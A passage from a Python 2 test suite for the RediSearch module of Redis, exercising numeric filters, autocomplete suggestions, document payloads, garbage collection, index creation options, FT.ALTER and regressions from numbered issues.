# Calling a stem directly works even with VERBATIM.
# You need to use the + prefix escaped
res = r.execute_command(
'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
env.assertEqual(2, len(res))
env.assertEqual(1, res[0])
def testNumericRange(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 5).error().contains("FILTER requires 3 arguments")
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 5, 'inf').error().contains("Bad upper range: inf")
env.expect('ft.search', 'idx', 'hello kitty', 'filter', 'score', 'inf', 5).error().contains("Bad lower range: inf")
for i in xrange(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 100)
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", 0, 50)
env.assertEqual(51, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
"filter", "score", "(0", "(50")
env.assertEqual(49, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
"filter", "score", "-inf", "+inf")
env.assertEqual(100, res[0])
# test multi filters
scrange = (19, 90)
prrange = (290, 385)
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", scrange[
0], scrange[1],
"filter", "price", prrange[0], prrange[1])
# print res
for doc in res[2::2]:
sc = int(doc[doc.index('score') + 1])
pr = int(doc[doc.index('price') + 1])
env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
env.assertGreaterEqual(pr, prrange[0])
env.assertLessEqual(pr, prrange[1])
env.assertEqual(10, res[0])
res = r.execute_command('ft.search', 'idx', 'hello kitty',
"filter", "score", "19", "90",
"filter", "price", "90", "185")
env.assertEqual(0, res[0])
# Test numeric ranges as part of query syntax
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
env.assertEqual(11, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(49, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
env.assertEqual(51, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
env.assertEqual(100, res[0])
def testSuggestions(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1))
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'INCR'))
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertEqual(1, len(res))
env.assertEqual("hello world", res[0])
terms = ["hello werld", "hallo world",
"yellow world", "wazzup", "herp", "derp"]
sz = 2
for term in terms:
env.assertEqual(sz, r.execute_command(
'ft.SUGADD', 'ac', term, sz - 1))
sz += 1
for _ in r.retry_with_rdb_reload():
env.assertEqual(7, r.execute_command('ft.SUGLEN', 'ac'))
# search not fuzzy
env.assertEqual(["hello world", "hello werld"],
r.execute_command("ft.SUGGET", "ac", "hello"))
# print r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1", "WITHSCORES")
# search fuzzy - shuold yield more results
env.assertEqual(['hello world', 'hello werld', 'yellow world', 'hallo world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY"))
# search fuzzy with limit of 1
env.assertEqual(['hello world'],
r.execute_command("ft.SUGGET", "ac", "hello", "FUZZY", "MAX", "1"))
# scores should return on WITHSCORES
rc = r.execute_command(
"ft.SUGGET", "ac", "hello", "WITHSCORES")
env.assertEqual(4, len(rc))
env.assertTrue(float(rc[1]) > 0)
env.assertTrue(float(rc[3]) > 0)
rc = r.execute_command("ft.SUGDEL", "ac", "hello world")
env.assertEqual(1L, rc)
rc = r.execute_command("ft.SUGDEL", "ac", "world")
env.assertEqual(0L, rc)
rc = r.execute_command("ft.SUGGET", "ac", "hello")
env.assertEqual(['hello werld'], rc)
def testSuggestErrors(env):
env.expect('ft.SUGADD ac olah 1').equal(1)
env.expect('ft.SUGADD ac olah 1 INCR').equal(1)
env.expect('ft.SUGADD ac missing').error().contains("wrong number of arguments")
env.expect('ft.SUGADD ac olah not_a_number').error().contains("invalid score")
env.expect('ft.SUGADD ac olah 1 PAYLOAD').error().contains('Invalid payload: Expected an argument, but none provided')
env.expect('ft.SUGADD ac olah 1 REDIS PAYLOAD payload').error().contains('Unknown argument `REDIS`')
env.expect('ft.SUGGET ac olah FUZZ').error().contains("Unrecognized argument: FUZZ")
query = 'verylongquery'
for _ in range(3):
query += query
env.expect('ft.SUGGET ac', query).error().contains("Invalid query")
env.expect('ft.SUGGET ac', query + query).error().contains("Invalid query length")
def testSuggestPayload(env):
r = env
env.assertEqual(1, r.execute_command(
'ft.SUGADD', 'ac', 'hello world', 1, 'PAYLOAD', 'foo'))
env.assertEqual(2, r.execute_command(
'ft.SUGADD', 'ac', 'hello werld', 1, 'PAYLOAD', 'bar'))
env.assertEqual(3, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload', 1, 'PAYLOAD', ''))
env.assertEqual(4, r.execute_command(
'ft.SUGADD', 'ac', 'hello nopayload2', 1))
res = r.execute_command("FT.SUGGET", "ac", "hello", 'WITHPAYLOADS')
env.assertListEqual(['hello world', 'foo', 'hello werld', 'bar', 'hello nopayload', None, 'hello nopayload2', None],
res)
res = r.execute_command("FT.SUGGET", "ac", "hello")
env.assertListEqual(['hello world', 'hello werld', 'hello nopayload', 'hello nopayload2'],
res)
res = r.execute_command(
"FT.SUGGET", "ac", "hello", 'WITHPAYLOADS', 'WITHSCORES')
# we don't compare the scores beause they may change
env.assertEqual(12, len(res))
def testPayload(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(10):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1.0,
'payload', 'payload %d' % i,
'fields', 'f', 'hello world'))
for x in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(21, len(res))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'withpayloads')
env.assertEqual(31, len(res))
env.assertEqual(10, res[0])
for i in range(1, 30, 3):
env.assertEqual(res[i + 1], 'payload %s' % res[i])
def testGarbageCollector(env):
env.skipOnCluster()
if env.moduleArgs is not None and 'GC_POLICY FORK' in env.moduleArgs:
# this test is not relevent for fork gc cause its not cleaning the last block
raise unittest.SkipTest()
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0,
'fields', 'foo', ' '.join(('term%d' % random.randrange(0, 10) for i in range(10)))))
def get_stats(r):
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
gc_stats = {d['gc_stats'][x]: float(
d['gc_stats'][x + 1]) for x in range(0, len(d['gc_stats']), 2)}
d['gc_stats'] = gc_stats
return d
stats = get_stats(r)
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 8)
env.assertEqual(0, stats['gc_stats']['bytes_collected'])
env.assertGreater(int(stats['num_records']), 0)
initialIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
for i in range(N):
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in range(100):
# gc is random so we need to do it long enough times for it to work
env.cmd('ft.debug', 'GC_FORCEINVOKE', 'idx')
stats = get_stats(r)
env.assertEqual(0, int(stats['num_docs']))
env.assertEqual(0, int(stats['num_records']))
if not env.is_cluster():
env.assertEqual(100, int(stats['max_doc_id']))
if 'current_hz' in stats['gc_stats']:
env.assertGreater(stats['gc_stats']['current_hz'], 30)
currentIndexSize = float(stats['inverted_sz_mb']) * 1024 * 1024
# print initialIndexSize, currentIndexSize,
# stats['gc_stats']['bytes_collected']
env.assertGreater(initialIndexSize, currentIndexSize)
env.assertGreater(stats['gc_stats'][
'bytes_collected'], currentIndexSize)
for i in range(10):
res = r.execute_command('ft.search', 'idx', 'term%d' % i)
env.assertEqual([0], res)
def testReturning(env):
env.assertCmdOk('ft.create', 'idx', 'schema',
'f1', 'text',
'f2', 'text',
'n1', 'numeric', 'sortable',
'f3', 'text')
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'DOC_{0}'.format(i), 1.0, 'fields',
'f2', 'val2', 'f1', 'val1', 'f3', 'val3',
'n1', i)
# RETURN 0. Simplest case
for x in env.retry_with_reload():
res = env.cmd('ft.search', 'idx', 'val*', 'return', '0')
env.assertEqual(11, len(res))
env.assertEqual(10, res[0])
for r in res[1:]:
env.assertTrue(r.startswith('DOC_'))
for field in ('f1', 'f2', 'f3', 'n1'):
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, field)
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
for pair in grouper(res[1:], 2):
docname, fields = pair
env.assertEqual(2, len(fields))
env.assertEqual(field, fields[0])
env.assertTrue(docname.startswith('DOC_'))
# Test that we don't return SORTBY fields if they weren't specified
# also in RETURN
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'f1',
'sortby', 'n1', 'ASC')
row = res[2]
# get the first result
env.assertEqual(['f1', 'val1'], row)
# Test when field is not found
res = env.cmd('ft.search', 'idx', 'val*', 'return', 1, 'nonexist')
env.assertEqual(21, len(res))
env.assertEqual(10, res[0])
# # Test that we don't crash if we're given the wrong number of fields
with env.assertResponseError():
res = env.cmd('ft.search', 'idx', 'val*', 'return', 700, 'nonexist')
def _test_create_options_real(env, *options):
options = [x for x in options if x]
has_offsets = 'NOOFFSETS' not in options
has_fields = 'NOFIELDS' not in options
has_freqs = 'NOFREQS' not in options
try:
env.cmd('ft.drop', 'idx')
except:
pass
options = ['idx'] + options + ['schema', 'f1', 'text', 'f2', 'text']
env.assertCmdOk('ft.create', *options)
for i in range(10):
env.assertCmdOk('ft.add', 'idx', 'doc{}'.format(
i), 0.5, 'fields', 'f1', 'value for {}'.format(i))
# Query
# res = env.cmd('ft.search', 'idx', "value for 3")
# if not has_offsets:
# env.assertIsNone(res)
# else:
# env.assertIsNotNone(res)
# Frequencies:
env.assertCmdOk('ft.add', 'idx', 'doc100',
1.0, 'fields', 'f1', 'foo bar')
env.assertCmdOk('ft.add', 'idx', 'doc200', 1.0,
'fields', 'f1', ('foo ' * 10) + ' bar')
res = env.cmd('ft.search', 'idx', 'foo')
env.assertEqual(2, res[0])
if has_offsets:
docname = res[1]
if has_freqs:
env.assertEqual('doc200', docname)
else:
env.assertEqual('doc100', docname)
env.assertCmdOk('ft.add', 'idx', 'doc300',
1.0, 'fields', 'f1', 'Hello')
res = env.cmd('ft.search', 'idx', '@f2:Hello')
if has_fields:
env.assertEqual(1, len(res))
else:
env.assertEqual(3, len(res))
def testCreationOptions(env):
from itertools import combinations
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
_test_create_options_real(env, *combo)
env.expect('ft.create', 'idx').error()
def testInfoCommand(env):
from itertools import combinations
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'NOFIELDS', 'schema', 'title', 'text'))
N = 50
for i in xrange(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'replace', 'fields',
'title', 'hello term%d' % i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(d['index_name'], 'idx')
env.assertEqual(d['index_options'], ['NOFIELDS'])
env.assertListEqual(
d['fields'], [['title', 'type', 'TEXT', 'WEIGHT', '1']])
if not env.is_cluster():
env.assertEquals(int(d['num_docs']), N)
env.assertEquals(int(d['num_terms']), N + 1)
env.assertEquals(int(d['max_doc_id']), N)
env.assertEquals(int(d['records_per_doc_avg']), 2)
env.assertEquals(int(d['num_records']), N * 2)
env.assertGreater(float(d['offset_vectors_sz_mb']), 0)
env.assertGreater(float(d['key_table_size_mb']), 0)
env.assertGreater(float(d['inverted_sz_mb']), 0)
env.assertGreater(float(d['bytes_per_record_avg']), 0)
env.assertGreater(float(d['doc_table_size_mb']), 0)
for x in range(1, 5):
for combo in combinations(('NOOFFSETS', 'NOFREQS', 'NOFIELDS', ''), x):
combo = list(filter(None, combo))
options = combo + ['schema', 'f1', 'text']
try:
env.cmd('ft.drop', 'idx')
except:
pass
env.assertCmdOk('ft.create', 'idx', *options)
info = env.cmd('ft.info', 'idx')
ix = info.index('index_options')
env.assertFalse(ix == -1)
opts = info[ix + 1]
# make sure that an empty opts string returns no options in
# info
if not combo:
env.assertListEqual([], opts)
for option in filter(None, combo):
env.assertTrue(option in opts)
def testNoStem(env):
env.cmd('ft.create', 'idx', 'schema', 'body',
'text', 'name', 'text', 'nostem')
if not env.isCluster():
# todo: change it to be more generic to pass on is_cluster
res = env.cmd('ft.info', 'idx')
env.assertEqual(res[5][1][5], 'NOSTEM')
for _ in env.retry_with_reload():
try:
env.cmd('ft.del', 'idx', 'doc')
except redis.ResponseError:
pass
# Insert a document
env.assertCmdOk('ft.add', 'idx', 'doc', 1.0, 'fields',
'body', "located",
'name', "located")
# Now search for the fields
res_body = env.cmd('ft.search', 'idx', '@body:location')
res_name = env.cmd('ft.search', 'idx', '@name:location')
env.assertEqual(0, res_name[0])
env.assertEqual(1, res_body[0])
def testSearchNonexistField(env):
# GH Issue 133
env.cmd('ft.create', 'idx', 'schema', 'title', 'text',
'weight', 5.0, 'body', 'text', 'url', 'text')
env.cmd('ft.add', 'idx', 'd1', 1.0, 'nosave', 'fields', 'title',
'hello world', 'body', 'lorem dipsum', 'place', '-77.0366 38.8977')
env.cmd('ft.search', 'idx', 'Foo', 'GEOFILTER',
'place', '-77.0366', '38.8977', '1', 'km')
def testSortbyMissingField(env):
# GH Issue 131
env.cmd('ft.create', 'ix', 'schema', 'txt',
'text', 'num', 'numeric', 'sortable')
env.cmd('ft.add', 'ix', 'doc1', 1.0, 'fields', 'txt', 'foo')
env.cmd('ft.search', 'ix', 'foo', 'sortby', 'num')
def testParallelIndexing(env):
# GH Issue 207
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
from threading import Thread
env.getConnection()
ndocs = 100
def runner(tid):
cli = env.getConnection()
for num in range(ndocs):
cli.execute_command('ft.add', 'idx', 'doc{}_{}'.format(tid, num), 1.0,
'fields', 'txt', 'hello world' * 20)
ths = []
for tid in range(10):
ths.append(Thread(target=runner, args=(tid,)))
[th.start() for th in ths]
[th.join() for th in ths]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(1000, int(d['num_docs']))
def testDoubleAdd(env):
# Tests issue #210
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'hello world')
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc1', 1.0,
'fields', 'txt', 'goodbye world')
env.assertEqual('hello world', env.cmd('ft.get', 'idx', 'doc1')[1])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(1, env.cmd('ft.search', 'idx', 'hello')[0])
# Now with replace
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'replace',
'fields', 'txt', 'goodbye world')
env.assertEqual(1, env.cmd('ft.search', 'idx', 'goodbye')[0])
env.assertEqual(0, env.cmd('ft.search', 'idx', 'hello')[0])
env.assertEqual('goodbye world', env.cmd('ft.get', 'idx', 'doc1')[1])
def testConcurrentErrors(env):
from multiprocessing import Process
import random
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
docs_per_thread = 100
num_threads = 50
docIds = ['doc{}'.format(x) for x in range(docs_per_thread)]
def thrfn():
myIds = docIds[::]
random.shuffle(myIds)
cli = env.getConnection()
with cli.pipeline(transaction=False) as pl:
for x in myIds:
pl.execute_command('ft.add', 'idx', x, 1.0,
'fields', 'txt', ' hello world ' * 50)
try:
pl.execute()
except Exception as e:
pass
# print e
thrs = [Process(target=thrfn) for x in range(num_threads)]
[th.start() for th in thrs]
[th.join() for th in thrs]
res = env.cmd('ft.info', 'idx')
d = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertEqual(100, int(d['num_docs']))
def testBinaryKeys(env):
env.cmd('ft.create', 'idx', 'schema', 'txt', 'text')
# Insert a document
env.cmd('ft.add', 'idx', 'Hello', 1.0, 'fields', 'txt', 'NoBin match')
env.cmd('ft.add', 'idx', 'Hello\x00World', 1.0, 'fields', 'txt', 'Bin match')
for _ in env.reloading_iterator():
exp = [2L, 'Hello\x00World', ['txt', 'Bin match'], 'Hello', ['txt', 'NoBin match']]
res = env.cmd('ft.search', 'idx', 'match')
env.assertEqual(exp, res)
def testNonDefaultDb(env):
if env.is_cluster():
raise unittest.SkipTest()
# Should be ok
env.cmd('FT.CREATE', 'idx1', 'schema', 'txt', 'text')
try:
env.cmd('SELECT 1')
except redis.ResponseError:
return
# Should fail
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx2', 'schema', 'txt', 'text')
def testDuplicateNonspecFields(env):
env.cmd('FT.CREATE', 'idx', 'schema', 'txt', 'text')
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'fields',
'f1', 'f1val', 'f1', 'f1val2', 'F1', 'f1Val3')
res = env.cmd('ft.get', 'idx', 'doc')
res = {res[i]: res[i + 1] for i in range(0, len(res), 2)}
env.assertTrue(res['f1'] in ('f1val', 'f1val2'))
env.assertEqual('f1Val3', res['F1'])
def testDuplicateFields(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'txt',
'TEXT', 'num', 'NUMERIC', 'SORTABLE')
for _ in env.retry_with_reload():
# Ensure the index assignment is correct after an rdb load
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc', 1.0, 'FIELDS',
'txt', 'foo', 'txt', 'bar', 'txt', 'baz')
# Try add hash
env.hmset('newDoc', {'txt': 'foo', 'Txt': 'bar', 'txT': 'baz'})
# Get the actual value:
from redis import ResponseError
if not env.is_cluster():
with env.assertResponseError(contained='twice'):
env.cmd('FT.ADDHASH', 'idx', 'newDoc', 1.0)
# Try with REPLACE
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE', 'FIELDS',
'txt', 'foo', 'txt', 'bar')
# With replace partial
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42)
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'REPLACE',
'PARTIAL', 'FIELDS', 'num', 42, 'num', 32)
def testDuplicateSpec(env):
with env.assertResponseError():
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1',
'text', 'n1', 'numeric', 'f1', 'text')
def testSortbyMissingFieldSparse(env):
# Note, the document needs to have one present sortable field in
# order for the indexer to give it a sort vector
env.cmd('ft.create', 'idx', 'SCHEMA', 'lastName', 'text',
'SORTABLE', 'firstName', 'text', 'SORTABLE')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'lastName', 'mark')
res = env.cmd('ft.search', 'idx', 'mark', 'WITHSORTKEYS', "SORTBY",
"firstName", "ASC", "limit", 0, 100)
# commented because we don't filter out exclusive sortby fields
# env.assertEqual([1L, 'doc1', None, ['lastName', 'mark']], res)
def testLuaAndMulti(env):
if env.is_cluster():
raise unittest.SkipTest()
# Ensure we can work in Lua and Multi environments without crashing
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'text', 'n1', 'numeric')
env.cmd('HMSET', 'hashDoc', 'f1', 'v1', 'n1', 4)
env.cmd('HMSET', 'hashDoc2', 'f1', 'v1', 'n1', 5)
r = env.getConnection()
r.eval("return redis.call('ft.add', 'idx', 'doc1', 1.0, 'fields', 'f1', 'bar')", "0")
r.eval("return redis.call('ft.addhash', 'idx', 'hashDoc', 1.0)", 0)
# Try in a pipeline:
with r.pipeline(transaction=True) as pl:
pl.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'f1', 'v3')
pl.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'f1', 'v4')
pl.execute_command('ft.addhash', 'idx', 'hashdoc2', 1.0)
pl.execute()
def testLanguageField(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'language', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0,
'FIELDS', 'language', 'gibberish')
res = env.cmd('FT.SEARCH', 'idx', 'gibberish')
env.assertEqual([1L, 'doc1', ['language', 'gibberish']], res)
# The only way I can verify that LANGUAGE is parsed twice is ensuring we
# provide a wrong language. This is much easier to test than trying to
# figure out how a given word is stemmed
with env.assertResponseError():
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'LANGUAGE',
'blah', 'FIELDS', 'language', 'gibber')
def testUninitSortvector(env):
# This would previously crash
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
for x in range(2000):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(
x), 1.0, 'FIELDS', 'f1', 'HELLO')
env.broadcast('SAVE')
for x in range(10):
env.broadcast('DEBUG RELOAD')
def normalize_row(row):
return to_dict(row)
def assertAggrowsEqual(env, exp, got):
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
# and now, it's just free form:
exp = sorted(to_dict(x) for x in exp[1:])
got = sorted(to_dict(x) for x in got[1:])
env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
from pprint import pprint
# pprint(exp)
# pprint(got)
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
exp = list(grouper(exp[1:], 2))
got = list(grouper(got[1:], 2))
for x in range(len(exp)):
exp_did, exp_fields = exp[x]
got_did, got_fields = got[x]
env.assertEqual(exp_did, got_did, message="at position {}".format(x))
got_fields = to_dict(got_fields)
exp_fields = to_dict(exp_fields)
env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
def testAlterIndex(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx', 'world')
env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
for x in range(10):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))
for _ in env.retry_with_reload():
# Test that sortable works
res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'], 'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'], 'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', [
'f1', 'hello', 'f3', 'val4'], 'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'], 'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
assertResultsEqual(env, exp, res)
# Test that we can add a numeric field
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
for _ in env.retry_with_reload():
res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
env.assertEqual([1, 'docN1', ['n1', '50']], res)
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'NOT_ADD', 'f2', 'TEXT').error()
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD').error()
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2').error()
def testAlterValidation(env):
# Test that constraints for ALTER comand
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'f0', 'TEXT')
for x in range(1, 32):
env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
# OK for now.
# Should be too many indexes
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')
env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'SCHEMA', 'f0', 'TEXT')
# print env.cmd('FT.INFO', 'idx2')
for x in range(1, 50):
env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')
env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)
env.cmd('FT.CREATE', 'idx3', 'SCHEMA', 'f0', 'text')
# Try to alter the index with garbage
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
ret = to_dict(env.cmd('ft.info', 'idx3'))
env.assertEqual(1, len(ret['fields']))
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_1(env):
if env.is_cluster():
raise unittest.SkipTest('ADDHASH unsupported!')
# Test random RDB regressions, see GH 366
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.hmset('foo', {'textfield': 'blah', 'numfield': 1})
env.cmd('FT.ADDHASH', 'idx1', 'foo', 1, 'replace')
env.cmd('FT.DEL', 'idx1', 'foo')
for _ in env.retry_with_reload():
pass # --just ensure it doesn't crash
def testIssue366_2(env):
# FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
# shutdown
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
env.cmd('ft.add', 'idx1', 'doc1', 1,
'PAYLOAD', '{"hello":"world2"}',
'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
for _ in env.retry_with_reload():
pass #
def testIssue654(env):
# Crashes during FILTER
env.cmd('ft.create', 'idx', 'schema', 'id', 'numeric')
env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
env.cmd('FT.CREATE', 'idx2', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
# Create a document and then replace it.
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's100', 'numfield', 990)
env.dump_and_reload()
# RDB Should still be fine
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's200', 'numfield', 1090)
doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
env.assertEqual('s200', doc['textfield'])
env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
command = ['ft.create', 'idx', 'schema']
for x in range(255):
command += ['t{}'.format(x), 'numeric', 'sortable']
command = command[:-1]
env.cmd(*command)
for _ in env.reloading_iterator():
try:
env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
except redis.ResponseError as e:
env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
